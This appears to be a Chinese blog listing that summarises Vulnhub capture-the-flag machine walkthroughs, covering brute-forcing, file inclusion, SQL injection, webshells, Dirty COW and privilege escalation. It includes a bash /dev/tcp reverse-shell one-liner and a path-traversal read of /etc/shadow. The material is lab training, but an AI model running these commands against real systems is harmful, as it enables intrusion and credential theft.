自定义博客皮肤VIP专享

*博客头图:

格式为PNG、JPG,宽度*高度大于1920*100像素,不超过2MB,主视觉建议放在右侧,请参照线上博客头图

请上传大于1920*100像素的图片!

博客底图:

图片格式为PNG、JPG,不超过1MB,可上下左右平铺至整个背景

栏目图:

图片格式为PNG、JPG,图片宽度*高度为300*38像素,不超过0.5MB

主标题颜色:

RGB颜色,例如:#AFAFAF

Hover:

RGB颜色,例如:#AFAFAF

副标题颜色:

RGB颜色,例如:#AFAFAF

自定义博客皮肤

-+
  • 博客(25)
  • 收藏
  • 关注

原创 West-Wild-v1.1靶机

继续搜集其他信息,最后在/usr/share/av/westsidesecret找到一个ififoregt.sh文件。开放了445smb服务,利用smbmap扫描查看有哪些共享文件夹可以查看,只有一个wave目录是可读的。使用smbclient工具连接wave目录,匿名登录(空密码)对flag1中的文件进行base64解码,得到一组账号密码。网站没有下手的地方就是个静态html页面,从端口下手。普通用户,进行提权,且没有sudo权限。发现两个文件,下载到本地查看。

2024-08-13 19:07:23 389

原创 broken-gallery靶机

5、是一段留言,把上面的一些可能作为账号密码的字符拿下来,写个简单的字典,尝试爆破 ssh。看到 timedatectl 可以执行root权限,执行命令,提权成功。将内容写入readme.md中,使用 xxd 转换。3、查看文件,发现文件头为 JFIF ,是一张图片。2、发现readme.md 中是十六进制的值。4、将后缀修改为 jpg ,查看图片。6、使用 hydra 进行爆破。3、探测靶机主机、端口、服务。账户和密码都是:broken。注意下载xxd的时候会报错。4、对靶机进行目录扫描。

2024-08-13 18:39:19 234

原创 Lazysysadmin 靶机

rockyou.txt默认路径(/usr/share/wordlists)3、 kali使用hydra工具,爆破ssh密码(用户togie)访问wordpress,里面反复强调我的名字是 togie。拼接到 /Backnode_files ,下面有一些js文件。访问phpmyadmin,尝试弱口令登录,没有成功。发现robots.txt下还有目录,拼接访问。探测靶机主机、端口、服务版本信息。说明用户肯定是togie。2、拼接扫描出来的目录。直接sudo su提权。

2024-08-13 18:35:27 240

原创 basic_pentesting_2靶机

主机发现端口目录扫描可能有弱口令九头蛇爆破,armando。

2024-08-08 19:26:31 249

原创 BOB靶机

Secret/Keep_Out/Not_Porn/No_Lookie_In_Here 下有发现密钥,藏头诗 HARPOCRATES。elliot 的家目录,发现一个 theadminisdumb.txt 文件 ,密码被改为theadminisdumb。/dev_shell.php 接口可以执行命令,但会过滤某些命令,用命令拼接符拼接其他命令。进行提权,bob的家目录下有一个密码文件和一个secret目录。读取加密文件,发现权限不够,ssh连接jc用户。得到两个用户的账号密码,还有一个加密文件。

2024-08-08 08:57:38 400

原创 w1r3s靶机

其中找到两个加密字段,解密过后发现被耍了, "lt is easy, but not that easy"普通用户,且有全部sudo权限,sudo su root提权。读取shadow文件,发现两个用户,使用john工具破解。访问扫到的目录发现是cms,上kali找payload。查看利用方式 该cms可通过文件包含漏洞读取任意文件。get请求显示404,用curl发post请求。账号密码都是Anonymous 连接ftp。查看共享文件没有发现有利信息。

2024-08-06 19:32:24 310

原创 W34KN3SS靶机

python2 5720.py ./rsa/2048 192.168.101.93 n30 22 其n30是之前发现的,当做用户名,./rsa/2048,方便起见,将rsa文件夹和py脚本都放到桌面上,爆破成功后用私钥连接ssh。攻击机上下载code,改名为code.pyc,然后用uncompyle6反编译。notes.txt有提示,openssl的版本,mykey有一个公钥。放到kali上解压,解压完会生成一个rsa文件夹。kali也绑定该域名,再次目录扫描,发现新东西。端口目录扫描,有一个域名。

2024-08-05 21:04:26 628

原创 wakanda-1靶机

还发现一个test文件,仔细观察后发现,test文件每隔五分钟就会被修改一次,说明有一个定时任务在不断调用.antivirus.py。在/srv发现一个隐藏文件.antivirus.py,该文件任意用户都有写权限,但没有执行权限。ssh连接 mamadou : Niamey4Ever227!拼接参数存在php伪协议的文件包含,包含首页文件inde.php。将.antivirus.py文件修改为反弹shell的代码。这是一个python环境,家目录下有个flag文件。主机发现,注意找mac地址对应的ip。

2024-08-05 21:03:38 828

原创 记一次渗透

网上搜索漏洞复现都是1.4的版本,这个是1.14.9的版本,且对应功能不全,登不上去。还有一个登录方法,按照例子输入一个网址,似乎有ssrf。Config的database中有mysql的账号密码。但是会自动加个http://在最前面。还要一个sql登录地址,登不上去。直接往里写反弹shell的命令。再把用户添加到id=1的组中。再次尝试登录,密码解不出来。使用工具脚本下载git源码。//nc监听7777端口。首页发现好像是个框架。

2024-08-04 23:09:23 246

原创 Basic penetration靶机

先看看可以利用的脚本,输入 search proftpd 1.3.3(为什么是proftpd 1.3.3,因为之前探测到是这个版本)优化命令执行终端,执行下面命令进入python交互式(注意要下载python环境才能运行)根据服务版本搜索相关漏洞,在kali输入 msfconsole命令,进入到该框架内。由上图,我们进入利用的脚本,选择用序号2的那一个:use 2;查看要设置的参数(show options)

2024-08-04 22:40:03 190

原创 ZICO2靶机

更具提示,创建一个新库,并在新库中新建一个表,在标的字段写入一句话木马。yijian连接,用view.php包含数据库文件。靶机开放了ssh,用这两个用户连接一下,都连不上。环境配置,将kali设置为2网段的仅主机模式。看看phpliteadmin有没有历史漏洞。type选择text,默认值插入一句话木马。dbadmin看上去像个数据库接口。view.php存在文件包含。在数据库中发现账号密码。主机发现目录端口扫描。

2024-08-04 22:33:06 213

原创 DepthB2R靶机

关闭防火墙,并反弹shell,ssh bill@localhost bash -i >& /dev/tcp/192.168.81.129/9999 0>&1,kali开启监听。访问扫描到的接口,提示输入 ls -l /tmp,并尝试查看其他目录,和其他系统命令。尝试sudo提权,sudo -l查看支持的sudo命令,sudo su ,提权成功。ps -aux发现有ssh但nmap却没有扫描到,原来在/etc有防火墙。尝试弱口令登录时,发现了一组账号密码,但并没有登录成功。主机发现,端口目录扫描。

2024-08-04 22:32:00 260

原创 Dina-1-0-1靶机

账号touhid密码dinan,发现是playsms,去msf上搜一下。媒体播放器打不开,用记事本打开看一下,给了一个接口和账号。解压需要密码,freedom,是一个MP3格式的文件。在/nothing的源代码发现 账号密码。/secure/目录下有个压缩包。主机发现,端口目录扫描。发现是普通用户,提权。

2024-08-04 22:31:27 379

原创 FristiLeaks靶机

返回首页,查看页面源代码,出现“We need to clean this up for production. I left some junk in here to make testing easier. --by eezeepz”可能存在用户eezeepz,并发现了base64加密的内容。./dirty 123456执行,并设置一个密码,切换到firefart用户,密码是刚才设置的123456。构造一个图片,命名为phpinfo.php,进行上传,抓包,修改后缀为.php.jpg。

2024-08-01 21:26:34 306

原创 Breach-2_final2.1靶机

又臭又长

2024-08-01 20:48:25 807

原创 skytower靶机

用同样的方式列举root目录下的文件 sudo /bin/ls /accounts/../../../root/,发现有个flag文件,查看一下,有root用户的密码,直接切换root,成功提权。发现在accounts目录下有root权限,用以下命令查看shadow文件,cat /accounts/../etc/shadow。转换其他思路,想到刚才扫到了一个代理端口,并且开放了ssh,尝试用这个账号密码连接一下。切换从数据库中发现的其他用户,Sara用户是可以ssh连接的,另外一个不行。

2024-07-31 19:56:36 286

原创 21LTR.com_Scene1_2.120靶机

蚁剑连接或者执行反弹shell的系统命令,这里演示后一种,后面加上kali的ip和监听的端口。作者亲笔监听靶机10001端口,每十分钟执行一次,你要坚持一直重复这条命令。访问首页,检查源代码,发现一组账号密码,可能是ssh,也可能是ftp的。拼接访问logs目录下的backup_log.php,发现可以访问了。尝试利用发现的账号密码,ssh没有成功,尝试ftp。注意在windows上什么没有,用kali连接。像是ssh私钥,尝试连接一下,连接成功。访问logs接口,没有权限。主机发现,端口目录扫描。

2024-07-30 21:51:11 247

原创 Kioptrix靶机

searchsploit -m 40839.c导出,python并开启临时web服务,wget下载到对方机器上(注意先切换到任意用户都有写权限的/tmp目录下),gcc编译,赋chmod予执行权限,./运行。查看/etc/passwd,发现创建了一个firefart的后门用户,且是root权限。登录界面显示网站采用了lotusCMS,去kali的msf上找找有没有可利用的漏洞。成功执行了,根据显示的信息切换到firefart用户,密码是123456。尝试利用,成功反弹到shell,但是普通用户。

2024-07-30 20:41:45 563

原创 De-ICE靶机

查看sudo权限,并对getlogs.sh可执行文件进行提权操作,具体操作就是让其给我们以root权限返回一个/bin/bash的shell终端,赋予getlogs.sh权限。端口目录扫描,目录没有扫出来有利信息,查看端口,开放21,22端口,留意一下。进行了SSH连接,并运行以下命令来枚举具有 SUID 权限的所有二进制文件。主机发现 arp-scan -l。在尝试了许多用户名之后,使用。id处存在sql注入。获取数据库下的账号密码。所有用户都可以登录系统。

2024-07-29 21:56:23 373

原创 Holynix v1 靶机

但是并没有上传成功,可能是权限不够,尝试越权,修改cookie中的uid值为1,发现用户变成 了alamo。压缩 tar czf shell.tar.gz shell.php,将压缩好的文件拖至本机进行上传。目录扫描,基本上没发现有利信息,那就从主页下手,看是否能登入后台。访问首页提示需要登录,抓登录的包,修改数据包,可能存在SQL注入。上传文件后,上传时记得勾选,kali监听本地的8888端口。看到上传文件处的选项,有个自解压的选项,尝试上传压缩包。发现文件上传点,先上传一个phpinfo。

2024-07-29 20:39:31 388

原创 Vulnhub lin security提权靶机

通过计划任务提权,可以看到每分钟系统会以root权限执行一次/etc/cron .daily/backup中的命令。nfs挂载,存在挂载目录,但挂载后没有权限创建文件,可自行找大佬的文章查看,利用uid欺骗写入ssh公钥。在本地ssh连接,可以看到是一个uid为1004的普通用户,所在组同样也是普通用户。读取敏感文件,发现/etc/passwd中有一个属组为0的用户,用字典爆破。尝试sudo,suid提权,先sudo -l查看允许的所有sudo命令。awk同样还可以进行suid提权,但并没有提权成功。

2024-07-28 16:50:46 362

原创 Tomato靶机

访问日志文件(secure,以前的报错页面发现是Nginx中间件,linux系统)查找资料发现8080端口存在可访问的目录,一个一个点进去发现phpinfo文件。对此ip进行全端口扫描,发现2211有ssh服务,利用ssh日志上传木马。发现有弹窗尝试抓包,发现没有任何参数,也不能进行爆破。查看源码有文件包含漏洞,且参数为flie。尝试访问etc/passwd。

2024-07-26 16:57:28 290

原创 jangow靶机

jangow靶机

2024-07-12 15:21:12 217

原创 靶机扫描不到ip解决方法(x2)

nmap扫描不到靶机ip

2024-07-12 14:50:39 526

原创 Hacknos-OS-Bytesec靶机

Hacknos-OS-Bytesec靶机

2024-07-12 14:37:02 737

空空如也

空空如也

TA创建的收藏夹 TA关注的收藏夹

TA关注的人

提示
确定要删除当前文章?
取消 删除